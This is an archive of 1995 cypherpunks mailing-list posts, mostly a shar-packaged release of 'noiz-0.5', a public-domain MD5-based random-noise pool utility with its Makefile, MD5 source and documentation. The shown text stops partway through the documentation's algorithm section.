Path: xpat.postech.ac.kr!news.kreonet.re.kr!insosf1.infonet.net!solaris.cc.vt.edu!news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 7 Feb 95 12:27:55 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: dna ink
In-Reply-To: <199502071926.LAA21751@largo.remailer.net>
Message-ID: <9502072020.AA08784@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    Digital "signatures" are the first real unforgeable authentication
>    technology mankind has developed.
> 
> Impossibility is a pretty strong concept, and here, as elsewhere, it's
> an exaggeration.

Naturally -- but the other methods were complete jokes -- forging a
signature requires nothing more than a pen and slight practice.

> The concept of forgery adheres to
> the person committing the act, not the act itself.

Indeed -- which is why witnesses used to be the primary verification
technology, and not graphologists...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Tue, 7 Feb 95 15:26:47 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann
In-Reply-To: <199502072300.AA20868@teal.csn.org>
Message-ID: <27154.792199642@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone yet discovered the secret reformatting necessary to
make Phil Dubois' signature check on that message?  The usual
trick of pulling all the paragraphs up onto one line wasn't
enough.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Tue, 7 Feb 95 15:54:09 PST
To: cypherpunks@toad.com
Subject: noiz-0.5: simple noise-emitting package
Message-ID: <199502072350.PAA17765@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


NAME

        noiz -- a simple package for accumulating and dispensing
                cryptographically-strong noise, using MD5 as
                a stirring function

	See "noiz.doc" for more information.

I'm interested in someone pointing out serious errors in my
algorithm or the implementation.  See particularly the ALGORITHM 
section at the end of "noiz.doc".

I believe this will meet Tim May's standards for practical entropy,
but probably not Matt Blaze's high standards.

It allows users to decide how much true entropy they require, and lets
them share entropy with each other if they want.  Crunching with MD5
obscures where the randomness came from.  The "noizout" command
produces 128 high-entropy bits in a split second, and can be repeated
for more, although it is theoretically better to add entropy to the pool
every time you take some out.  But I personally use a crontab that adds
a few bits every minute, and rely on the crunching to hide correlations.

			strick

p.s.  	I will be in chicago this weekend,
	so I'll mess the MVCPPM :(

----------------

MAKE A DIRECTORY NAMED "noiz-0.5" and unshar it there.

This works on SunOS and probably on almost any unix platform
with minor tweaks to the Makefile.


#! /bin/sh
# This is a shell archive.  Remove anything before this line, then unpack
# it by saving it into a file and typing "sh file".  To overwrite existing
# files, type "sh file -c".  You can also feed this as standard input via
# unshar, or by typing "sh <file", e.g..  If this archive is complete, you
# will see the following message at the end:
#		"End of shell archive."
# Contents:  README Makefile md5.c md5.h mkshar noiz.doc noiz.h
#   noizinit.c noizout.c noizspin.c noizstir.c patchlevel version
# Wrapped by strick@gwarn on Tue Feb  7 15:38:49 1995
PATH=/bin:/usr/bin:/usr/ucb ; export PATH
if test -f 'README' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'README'\"
else
echo shar: Extracting \"'README'\" \(694 characters\)
sed "s/^X//" >'README' <<'END_OF_FILE'
XNAME
X
X	noiz -- a simple package for accumulating and dispensing
X		cryptographically-strong noise, using MD5 as 
X		a stirring function
X
XANTICOPYRIGHT
X
X	Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X	This package is placed this package in the public domain.
X
X	Because this package is free, there is no warranty 
X	for it whatsoever.  Caveat hacker.
X
X	This is alpha-quality software.  It seemed to work for
X	me, but it may not do what I say it does.
X
X	The MD5 implementation is by Colin Plumb (1993), 
X	and is also in the public domain.
X
X
XSee "noiz.doc" for more information.
X
X
XEND $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/README,v 1.1 95/02/07 14:55:59 strick Exp Locker: strick $
END_OF_FILE
if test 694 -ne `wc -c <'README'`; then
    echo shar: \"'README'\" unpacked with wrong size!
fi
# end of 'README'
fi
if test -f 'Makefile' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'Makefile'\"
else
echo shar: Extracting \"'Makefile'\" \(1904 characters\)
sed "s/^X//" >'Makefile' <<'END_OF_FILE'
X#####  noiz/Makefile
X#
X#       Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X#
X#       This package is placed this package in the public domain.
X#
X#       Because this package is free, there is no warranty
X#       for it whatsoever.  Caveat hacker.
X#
X#
X#       This file Makefile is dedicated to the ascii	TAB	character.
X#
X
XBIN=/usr/local/bin
XNOIZ=/etc/noiz
X
XOWNER=root
XGROUP=kmem
X
XCC= gcc
XCFLAGS= -O -D'NOIZ_FILE="$(NOIZ)"'
X
X
Xall : noizinit noizstir noizout noizspin
X
Xnoizstir : noizstir.o md5.o 
X	$(CC) -o noizstir $(CFLAGS) noizstir.o md5.o
X
Xnoizout : noizout.o md5.o 
X	$(CC) -o noizout $(CFLAGS) noizout.o md5.o
X
Xclean:
X	rm -f *.o
X	rm -f noizinit noizstir noizout noizspin
X	rm -f a.out core
X
Xinstall: all
X	test -d $(BIN) || mkdir $(BIN)
X	strip noizinit noizout noizstir noizspin
X	install -o $(OWNER) -g $(GROUP) -m  550 noizinit $(BIN)
X	install -o $(OWNER) -g $(GROUP) -m 2555 noizstir $(BIN)
X	install -o $(OWNER) -g $(GROUP) -m 2555 noizout $(BIN)
X	install -o $(OWNER) -g $(GROUP) -m  555 noizspin $(BIN)
X	$(BIN)/noizinit
X	chown $(OWNER) $(NOIZ)
X	chgrp $(GROUP) $(NOIZ)
X	chmod 660 $(NOIZ)
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	ls -li / /var/adm/ | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	netstat -s | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	$(BIN)/noizspin | $(BIN)/noizstir
X	:
X	:
X	: Suggestion for your crontab:
X	:   "* * * * * $(BIN)/noizspin | $(BIN)/noizstir"
X	:
X
X# END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/Makefile,v 1.6 95/02/07 15:35:36 strick Exp Locker: strick $
END_OF_FILE
if test 1904 -ne `wc -c <'Makefile'`; then
    echo shar: \"'Makefile'\" unpacked with wrong size!
fi
# end of 'Makefile'
fi
if test -f 'md5.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'md5.c'\"
else
echo shar: Extracting \"'md5.c'\" \(7656 characters\)
sed "s/^X//" >'md5.c' <<'END_OF_FILE'
X/*
X * This code implements the MD5 message-digest algorithm.
X * The algorithm is due to Ron Rivest.  This code was
X * written by Colin Plumb in 1993, no copyright is claimed.
X * This code is in the public domain; do with it what you wish.
X *
X * Equivalent code is available from RSA Data Security, Inc.
X * This code has been tested against that, and is equivalent,
X * except that you don't need to include two pages of legalese
X * with every copy.
X *
X * To compute the message digest of a chunk of bytes, declare an
X * MD5Context structure, pass it to MD5Init, call MD5Update as
X * needed on buffers full of bytes, and then call MD5Final, which
X * will fill a supplied 16-byte array with the digest.
X */
X#include <string.h>	/* for memcpy() */
X#include "md5.h"
X
X#ifndef HIGHFIRST
X#define byteReverse(buf, len)	/* Nothing */
X#else
Xvoid byteReverse(unsigned char *buf, unsigned longs);
X
X#ifndef ASM_MD5
X/*
X * Note: this code is harmless on little-endian machines.
X */
Xvoid byteReverse(unsigned char *buf, unsigned longs)
X{
X	uint32 t;
X	do {
X		t = (uint32)((unsigned)buf[3]<<8 | buf[2]) << 16 |
X		            ((unsigned)buf[1]<<8 | buf[0]);
X		*(uint32 *)buf = t;
X		buf += 4;
X	} while (--longs);
X}
X#endif
X#endif
X
X/*
X * Start MD5 accumulation.  Set bit count to 0 and buffer to mysterious
X * initialization constants.
X */
Xvoid
XMD5Init(struct MD5Context *ctx)
X{
X	ctx->buf[0] = 0x67452301;
X	ctx->buf[1] = 0xefcdab89;
X	ctx->buf[2] = 0x98badcfe;
X	ctx->buf[3] = 0x10325476;
X
X	ctx->bits[0] = 0;
X	ctx->bits[1] = 0;
X}
X
X/*
X * Update context to reflect the concatenation of another buffer full
X * of bytes.
X */
Xvoid
XMD5Update(struct MD5Context *ctx, unsigned char const *buf, unsigned len)
X{
X	uint32 t;
X
X	/* Update bitcount */
X
X	t = ctx->bits[0];
X	if ((ctx->bits[0] = t + ((uint32)len << 3)) < t)
X		ctx->bits[1]++;	/* Carry from low to high */
X	ctx->bits[1] += len >> 29;
X
X	t = (t >> 3) & 0x3f;	/* Bytes already in shsInfo->data */
X
X	/* Handle any leading odd-sized chunks */
X
X	if ( t ) {
X		unsigned char *p = (unsigned char *)ctx->in + t;
X
X		t = 64-t;
X		if (len < t) {
X			memcpy(p, buf, len);
X			return;
X		}
X		memcpy(p, buf, t);
X		byteReverse(ctx->in, 16);
X		MD5Transform(ctx->buf, (uint32 *)ctx->in);
X		buf += t;
X		len -= t;
X	}
X
X	/* Process data in 64-byte chunks */
X
X	while (len >= 64) {
X		memcpy(ctx->in, buf, 64);
X		byteReverse(ctx->in, 16);
X		MD5Transform(ctx->buf, (uint32 *)ctx->in);
X		buf += 64;
X		len -= 64;
X	}
X
X	/* Handle any remaining bytes of data. */
X
X	memcpy(ctx->in, buf, len);
X}
X
X/*
X * Final wrapup - pad to 64-byte boundary with the bit pattern 
X * 1 0* (64-bit count of bits processed, MSB-first)
X */
Xvoid
XMD5Final(unsigned char digest[16], struct MD5Context *ctx)
X{
X	unsigned count;
X	unsigned char *p;
X
X	/* Compute number of bytes mod 64 */
X	count = (ctx->bits[0] >> 3) & 0x3F;
X
X	/* Set the first char of padding to 0x80.  This is safe since there is
X	   always at least one byte free */
X	p = ctx->in + count;
X	*p++ = 0x80;
X
X	/* Bytes of padding needed to make 64 bytes */
X	count = 64 - 1 - count;
X
X	/* Pad out to 56 mod 64 */
X	if (count < 8) {
X		/* Two lots of padding:  Pad the first block to 64 bytes */
X		memset(p, 0, count);
X		byteReverse(ctx->in, 16);
X		MD5Transform(ctx->buf, (uint32 *)ctx->in);
X
X		/* Now fill the next block with 56 bytes */
X		memset(ctx->in, 0, 56);
X	} else {
X		/* Pad block to 56 bytes */
X		memset(p, 0, count-8);
X	}
X	byteReverse(ctx->in, 14);
X
X	/* Append length in bits and transform */
X	((uint32 *)ctx->in)[ 14 ] = ctx->bits[0];
X	((uint32 *)ctx->in)[ 15 ] = ctx->bits[1];
X
X	MD5Transform(ctx->buf, (uint32 *)ctx->in);
X	byteReverse((unsigned char *)ctx->buf, 4);
X	memcpy(digest, ctx->buf, 16);
X	memset(ctx, 0, sizeof(ctx));	/* In case it's sensitive */
X}
X
X#ifndef ASM_MD5
X
X/* The four core functions - F1 is optimized somewhat */
X
X/* #define F1(x, y, z) (x & y | ~x & z) */
X#define F1(x, y, z) (z ^ (x & (y ^ z)))
X#define F2(x, y, z) F1(z, x, y)
X#define F3(x, y, z) (x ^ y ^ z)
X#define F4(x, y, z) (y ^ (x | ~z))
X
X/* This is the central step in the MD5 algorithm. */
X#define MD5STEP(f, w, x, y, z, data, s) \
X	( w += f(x, y, z) + data,  w = w<<s | w>>(32-s),  w += x )
X
X/*
X * The core of the MD5 algorithm, this alters an existing MD5 hash to
X * reflect the addition of 16 longwords of new data.  MD5Update blocks
X * the data and converts bytes into longwords for this routine.
X */
Xvoid
XMD5Transform(uint32 buf[4], uint32 const in[16])
X{
X	register uint32 a, b, c, d;
X
X	a = buf[0];
X	b = buf[1];
X	c = buf[2];
X	d = buf[3];
X
X	MD5STEP(F1, a, b, c, d, in[ 0]+0xd76aa478,  7);
X	MD5STEP(F1, d, a, b, c, in[ 1]+0xe8c7b756, 12);
X	MD5STEP(F1, c, d, a, b, in[ 2]+0x242070db, 17);
X	MD5STEP(F1, b, c, d, a, in[ 3]+0xc1bdceee, 22);
X	MD5STEP(F1, a, b, c, d, in[ 4]+0xf57c0faf,  7);
X	MD5STEP(F1, d, a, b, c, in[ 5]+0x4787c62a, 12);
X	MD5STEP(F1, c, d, a, b, in[ 6]+0xa8304613, 17);
X	MD5STEP(F1, b, c, d, a, in[ 7]+0xfd469501, 22);
X	MD5STEP(F1, a, b, c, d, in[ 8]+0x698098d8,  7);
X	MD5STEP(F1, d, a, b, c, in[ 9]+0x8b44f7af, 12);
X	MD5STEP(F1, c, d, a, b, in[10]+0xffff5bb1, 17);
X	MD5STEP(F1, b, c, d, a, in[11]+0x895cd7be, 22);
X	MD5STEP(F1, a, b, c, d, in[12]+0x6b901122,  7);
X	MD5STEP(F1, d, a, b, c, in[13]+0xfd987193, 12);
X	MD5STEP(F1, c, d, a, b, in[14]+0xa679438e, 17);
X	MD5STEP(F1, b, c, d, a, in[15]+0x49b40821, 22);
X
X	MD5STEP(F2, a, b, c, d, in[ 1]+0xf61e2562,  5);
X	MD5STEP(F2, d, a, b, c, in[ 6]+0xc040b340,  9);
X	MD5STEP(F2, c, d, a, b, in[11]+0x265e5a51, 14);
X	MD5STEP(F2, b, c, d, a, in[ 0]+0xe9b6c7aa, 20);
X	MD5STEP(F2, a, b, c, d, in[ 5]+0xd62f105d,  5);
X	MD5STEP(F2, d, a, b, c, in[10]+0x02441453,  9);
X	MD5STEP(F2, c, d, a, b, in[15]+0xd8a1e681, 14);
X	MD5STEP(F2, b, c, d, a, in[ 4]+0xe7d3fbc8, 20);
X	MD5STEP(F2, a, b, c, d, in[ 9]+0x21e1cde6,  5);
X	MD5STEP(F2, d, a, b, c, in[14]+0xc33707d6,  9);
X	MD5STEP(F2, c, d, a, b, in[ 3]+0xf4d50d87, 14);
X	MD5STEP(F2, b, c, d, a, in[ 8]+0x455a14ed, 20);
X	MD5STEP(F2, a, b, c, d, in[13]+0xa9e3e905,  5);
X	MD5STEP(F2, d, a, b, c, in[ 2]+0xfcefa3f8,  9);
X	MD5STEP(F2, c, d, a, b, in[ 7]+0x676f02d9, 14);
X	MD5STEP(F2, b, c, d, a, in[12]+0x8d2a4c8a, 20);
X
X	MD5STEP(F3, a, b, c, d, in[ 5]+0xfffa3942,  4);
X	MD5STEP(F3, d, a, b, c, in[ 8]+0x8771f681, 11);
X	MD5STEP(F3, c, d, a, b, in[11]+0x6d9d6122, 16);
X	MD5STEP(F3, b, c, d, a, in[14]+0xfde5380c, 23);
X	MD5STEP(F3, a, b, c, d, in[ 1]+0xa4beea44,  4);
X	MD5STEP(F3, d, a, b, c, in[ 4]+0x4bdecfa9, 11);
X	MD5STEP(F3, c, d, a, b, in[ 7]+0xf6bb4b60, 16);
X	MD5STEP(F3, b, c, d, a, in[10]+0xbebfbc70, 23);
X	MD5STEP(F3, a, b, c, d, in[13]+0x289b7ec6,  4);
X	MD5STEP(F3, d, a, b, c, in[ 0]+0xeaa127fa, 11);
X	MD5STEP(F3, c, d, a, b, in[ 3]+0xd4ef3085, 16);
X	MD5STEP(F3, b, c, d, a, in[ 6]+0x04881d05, 23);
X	MD5STEP(F3, a, b, c, d, in[ 9]+0xd9d4d039,  4);
X	MD5STEP(F3, d, a, b, c, in[12]+0xe6db99e5, 11);
X	MD5STEP(F3, c, d, a, b, in[15]+0x1fa27cf8, 16);
X	MD5STEP(F3, b, c, d, a, in[ 2]+0xc4ac5665, 23);
X
X	MD5STEP(F4, a, b, c, d, in[ 0]+0xf4292244,  6);
X	MD5STEP(F4, d, a, b, c, in[ 7]+0x432aff97, 10);
X	MD5STEP(F4, c, d, a, b, in[14]+0xab9423a7, 15);
X	MD5STEP(F4, b, c, d, a, in[ 5]+0xfc93a039, 21);
X	MD5STEP(F4, a, b, c, d, in[12]+0x655b59c3,  6);
X	MD5STEP(F4, d, a, b, c, in[ 3]+0x8f0ccc92, 10);
X	MD5STEP(F4, c, d, a, b, in[10]+0xffeff47d, 15);
X	MD5STEP(F4, b, c, d, a, in[ 1]+0x85845dd1, 21);
X	MD5STEP(F4, a, b, c, d, in[ 8]+0x6fa87e4f,  6);
X	MD5STEP(F4, d, a, b, c, in[15]+0xfe2ce6e0, 10);
X	MD5STEP(F4, c, d, a, b, in[ 6]+0xa3014314, 15);
X	MD5STEP(F4, b, c, d, a, in[13]+0x4e0811a1, 21);
X	MD5STEP(F4, a, b, c, d, in[ 4]+0xf7537e82,  6);
X	MD5STEP(F4, d, a, b, c, in[11]+0xbd3af235, 10);
X	MD5STEP(F4, c, d, a, b, in[ 2]+0x2ad7d2bb, 15);
X	MD5STEP(F4, b, c, d, a, in[ 9]+0xeb86d391, 21);
X
X	buf[0] += a;
X	buf[1] += b;
X	buf[2] += c;
X	buf[3] += d;
X}
X#endif
END_OF_FILE
if test 7656 -ne `wc -c <'md5.c'`; then
    echo shar: \"'md5.c'\" unpacked with wrong size!
fi
# end of 'md5.c'
fi
if test -f 'md5.h' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'md5.h'\"
else
echo shar: Extracting \"'md5.h'\" \(519 characters\)
sed "s/^X//" >'md5.h' <<'END_OF_FILE'
X#ifndef MD5_H
X#define MD5_H
X
Xtypedef unsigned long uint32;
X
Xstruct MD5Context {
X	uint32 buf[4];
X	uint32 bits[2];
X	unsigned char in[64];
X};
X
Xvoid MD5Init(struct MD5Context *context);
Xvoid MD5Update(struct MD5Context *context, unsigned char const *buf, unsigned len);
Xvoid MD5Final(unsigned char digest[16], struct MD5Context *context);
Xvoid MD5Transform(uint32 buf[4], uint32 const in[16]);
X
X/*
X * This is needed to make RSAREF happy on some MS-DOS compilers.
X */
Xtypedef struct MD5Context MD5_CTX;
X
X#endif /* !MD5_H */
END_OF_FILE
if test 519 -ne `wc -c <'md5.h'`; then
    echo shar: \"'md5.h'\" unpacked with wrong size!
fi
# end of 'md5.h'
fi
if test -f 'mkshar' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'mkshar'\"
else
echo shar: Extracting \"'mkshar'\" \(76 characters\)
sed "s/^X//" >'mkshar' <<'END_OF_FILE'
X#!/bin/sh
Xset -x
Xmake clean
Xrm -f .shar
Xshar README Makefile [a-z]* > .shar
END_OF_FILE
if test 76 -ne `wc -c <'mkshar'`; then
    echo shar: \"'mkshar'\" unpacked with wrong size!
fi
# end of 'mkshar'
fi
if test -f 'noiz.doc' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noiz.doc'\"
else
echo shar: Extracting \"'noiz.doc'\" \(9532 characters\)
sed "s/^X//" >'noiz.doc' <<'END_OF_FILE'
XNAME
X
X	noiz -- a simple package for accumulating and dispensing
X		cryptographically-strong noise, using MD5 as 
X		a stirring function
X
XANTICOPYRIGHT
X
X	Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X	This package is placed this package in the public domain.
X
X	Because this package is free, there is no warranty 
X	for it whatsoever.  Caveat hacker.
X
X	This is alpha-quality software.  It seemed to work for
X	me, but it may not do what I say it does.
X
X	The MD5 implementation is by Colin Plumb (1993), 
X	and is also in the public domain.
X
X
XSYNOPSIS
X
X	noizinit
X
X		creates the file /etc/noiz
X
X
X	noizstir < noise-source
X
X		stirs the noise-source into /etc/noiz
X
X
X	noizout < noise-source > output-noise
X
X		produces 16 bytes of noise, for applications to use
X
X
X	noizspin > output-time
X
X		prints a somewhat-random number, with several bits of
X		entropy.
X
X
XFILES
X
X	/etc/noiz       a binary file containing 256 bytes of noise
X			state.   That's 2048 bits of entropy, assuming
X			it has been stirred with that much entropy.
X
X
X
XDESCRIPTION
X
X	noizinit        creates /etc/noiz and initializes it with bytes
X			0, 1, 2, 3, ... 255.
X
X			It must be stirred several times with noizstir
X			before it is ready to be used by noizout.
X
X
X	noizspin        Set an alarm for 1 second.  Using an unsigned
X			long, count until the alarm is received, and
X			print the count, in ascii, as a decimal number,
X			followed by a newline.
X
X
X	noizstir        changes the noise ("stirs" it) in /etc/noiz,
X			based on prior contents of /etc/noiz, current
X			time, pid, ppid, and input bytes read from
X			standard input.
X
X			The standard input may be empty (as in
X
X				noizstir < /dev/null
X
X			) or may be some system-generated noise (as in
X
X				ps uaxg | noizstir
X				ls -li /tmp/ | noizstir
X				netstat -s | noizstir
X
X			) or you may use the "noizspin" command which
X			was designed especially for this purpose:
X
X				noizspin | noizstir
X
X	noizout         Produces 16 bytes of random noise, based on the
X			contents of /etc/noiz, current time, pid, ppid,
X			and input bytes read from standard input.   The
X			output is 16 raw binary bytes; if you want some
X			kind of ascii encoding, you must convert the
X			output.  Piping the output into "od -x" is
X			useful for debugging.
X
X			Unlike noizstir, noizout does not change
X			/etc/noiz.  You may use it without empty
X			standard input, but it is better to feed it
X			some extra noise.  The noizspin command is good
X			for this:
X
X				noizspin | noizout 
X
X			The bytes emitted from noizout do not reveal
X			the contents of /etc/noiz.  In fact, no command
X			does, so all users can share /etc/noiz.
X
X			Because noizout always stirs current time, pid,
X			and ppid into its output, even this command,
X			repeated many times without running noizstir,
X			will generate fairly high-entropy random
X			output:
X
X				noizout < /dev/null
X				
X
X
XDIAGNOSTICS
X
X	All four programs print one line to stderr and exit with a
X	nonzero status if they cannot read or write /etc/noiz and they
X	need to.
X
X	Otherwise the programs execute without writing to stdout, and
X	they exit with status zero.
X
X
X
XRECOMMENDED INSTALLATION
X
X	You should probably be root to do the "make install".  You may
X	use "make BIN=/etc install" to put the four binaries into the
X	/etc/ directory instead of /usr/local/bin/.
X
X	/etc/noiz	owner root 
X			group kmem
X			mode 660     (not publically readable or writable)
X
X	/usr/local/bin/noizinit
X			owner root
X			group kmem
X			mode 550	(no special permissions)
X					(only execute at install time)
X
X	/usr/local/bin/noizstir
X			owner root
X			group kmem
X			mode 2555	(setgid kmem)
X					(anyone can execute)
X
X	/usr/local/bin/noizout
X			owner root
X			group kmem
X			mode 2555	(setgid kmem)
X					(anyone can execute)
X
X	/usr/local/bin/noizspin
X			owner root
X			group kmem
X			mode 555	(no special permissions)
X					(anyone can execute)
X
X
X	For your crontab:
X
X		* * * * * /usr/local/bin/noizspin | /usr/local/bin/noizstir
X
X		This will stir the /etc/noiz with a few bits of noise
X		per minute.
X
X		You may put it in the crontab for root, or for daemon,
X		or users themselves may do it.
X
X
XEXAMPLE SESSION
X
X		gwarn#
Xinitialize	gwarn#
X/etc/noiz	gwarn#
X		gwarn#
X		gwarn# /usr/local/bin/noizinit
Xshow initial	gwarn#
Xcontents 	gwarn#
X		gwarn# od -x /etc/noiz
X		0000000  0001 0203 0405 0607 0809 0a0b 0c0d 0e0f
X		0000020  1011 1213 1415 1617 1819 1a1b 1c1d 1e1f
X		0000040  2021 2223 2425 2627 2829 2a2b 2c2d 2e2f
X		0000060  3031 3233 3435 3637 3839 3a3b 3c3d 3e3f
X		0000100  4041 4243 4445 4647 4849 4a4b 4c4d 4e4f
X		0000120  5051 5253 5455 5657 5859 5a5b 5c5d 5e5f
X		0000140  6061 6263 6465 6667 6869 6a6b 6c6d 6e6f
X		0000160  7071 7273 7475 7677 7879 7a7b 7c7d 7e7f
X		0000200  8081 8283 8485 8687 8889 8a8b 8c8d 8e8f
X		0000220  9091 9293 9495 9697 9899 9a9b 9c9d 9e9f
X		0000240  a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf
X		0000260  b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf
X		0000300  c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf
X		0000320  d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf
X		0000340  e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef
X		0000360  f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff
X		0000400
X		gwarn#
Xspin some 	gwarn#
Xrandom numbers	gwarn#
Xwith noizspin	gwarn#
X		gwarn# noizspin
X		3082293
X		gwarn# noizspin
X		3025490
X		gwarn# noizspin
X		3077496
X		gwarn# noizspin
X		2985100
X		gwarn# noizspin
X		3047690
X		gwarn# noizspin
X		3082529
X		gwarn# noizspin
X		3063415
X/etc/noiz	gwarn#
Xis unchanged	gwarn#
Xuntil stirred	gwarn#
X		gwarn# od -x /etc/noiz
X		0000000  0001 0203 0405 0607 0809 0a0b 0c0d 0e0f
X		0000020  1011 1213 1415 1617 1819 1a1b 1c1d 1e1f
X		0000040  2021 2223 2425 2627 2829 2a2b 2c2d 2e2f
X		0000060  3031 3233 3435 3637 3839 3a3b 3c3d 3e3f
X		0000100  4041 4243 4445 4647 4849 4a4b 4c4d 4e4f
X		0000120  5051 5253 5455 5657 5859 5a5b 5c5d 5e5f
X		0000140  6061 6263 6465 6667 6869 6a6b 6c6d 6e6f
X		0000160  7071 7273 7475 7677 7879 7a7b 7c7d 7e7f
X		0000200  8081 8283 8485 8687 8889 8a8b 8c8d 8e8f
X		0000220  9091 9293 9495 9697 9899 9a9b 9c9d 9e9f
X		0000240  a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf
X		0000260  b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf
X		0000300  c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf
X		0000320  d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf
X		0000340  e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef
X		0000360  f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff
X		0000400
X		gwarn#
Xso stir it,	gwarn#
Xwith some	gwarn#
Xrandom input	gwarn#
X		gwarn# noizspin | noizstir
X		gwarn# od -x /etc/noiz
X		0000000  b695 3c73 7a0c 73e0 b37b 55f5 e6cf 2dec
X		0000020  1fa7 1544 890e a039 6a21 e2ec 4669 35ea
X		0000040  a9d8 1175 0dd9 9742 fd6a 1501 9039 1d73
X		0000060  2b0e 0864 93e8 63bf 4a63 3398 b63c ef77
X		0000100  2534 cd7e 0e79 fb56 5f53 bcc5 5b68 968d
X		0000120  910e bbf4 e222 03b2 13d8 908c e508 74a8
X		0000140  d056 fb99 ea7f dddb 9b2f c654 4cd0 1384
X		0000160  8899 3507 1dbb c367 43f1 9806 17e0 8780
X		0000200  95f7 af5a 7a78 92e0 126c 4f2d 3721 a5ee
X		0000220  4a12 f7c3 3186 febb 3ea8 f048 4fd1 41b8
X		0000240  812f 1d43 66a7 8e2d 7ca4 cddb 39c6 6b5f
X		0000260  9a8c 646b c511 304b eb9b b235 46da 5d2e
X		0000300  ec53 5816 c742 e92d 2468 8579 302d d932
X		0000320  2f45 03fb 4f2c ff10 b84d 15a5 8e46 8e84
X		0000340  ff12 0d68 26a3 10c2 87b5 4ebc 3b59 afa2
X		0000360  2bb2 bb64 371e 2f99 b108 c7d5 42eb 68c9
X		gwarn#
X		gwarn#
Xnow emit some 	gwarn#
X16-byte		gwarn#
Xhigh-entropy	gwarn#
Xoutput and 	gwarn#
Xdisplay it	gwarn#
Xwith od -x	gwarn#
X		gwarn# noizspin | noizout | od -x
X		0000000  be7b 81f9 744c 2dca e36d a6c6 9394 7bf2
X		0000020
X		gwarn# noizspin | noizout | od -x
X		0000000  1cea b243 2b0e 55c3 7630 886c 3be3 d03f
X		0000020
X		gwarn# noizspin | noizout | od -x
X		0000000  6887 864d b4fc 40e6 7eb1 0d9e 6b47 f148
X		0000020
X		gwarn#
Xdemonstrate	gwarn#
Xhigh-entropy	gwarn#
Xoutput even	gwarn#
Xwithout noise	gwarn#
Xinput and 	gwarn#
Xwithout 	gwarn#
Xstirring	gwarn#
X		gwarn#
X		gwarn# noizout < /dev/null | od -x
X		0000000  e54f 67a6 52ec 3d61 ddfd 1208 5f52 fead
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  6472 5f9e fe81 fcab bca8 6d22 2400 0d0a
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  2df4 9d73 ddc2 5aa4 10c6 59b8 e31c efda
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  7f64 6671 957e b4aa ae4b 8fd8 7e90 601e
X		0000020
X		gwarn# noizout < /dev/null | od -x
X		0000000  2d8e 522c 700a 5367 d67f dae3 0977 0689
X		0000020
X
X
X
XALGORITHMS
X
X   Let the syntax X[i..j] represent a subrange of an array X.
X   Let the syntax X[] represent the entire array X.
X
X   Let the array Noiz[0..15][0..15] represent the 256 bytes of /etc/noiz
X   Let the array Noiz[r] represent the rth row (16 bytes) of Noiz
X
X   Let the array Input[] represent bytes read from standard input
X
X   Let the syntax  MD5( x, y, z... )  represent the MD5 hash of the 
X   concatenation of the arguments x, y, z...
X
X
X
X   Algorithm of "noizstir":
X
X	read Noiz[][] from /etc/noiz
X
X	read Input[] from standard input
X
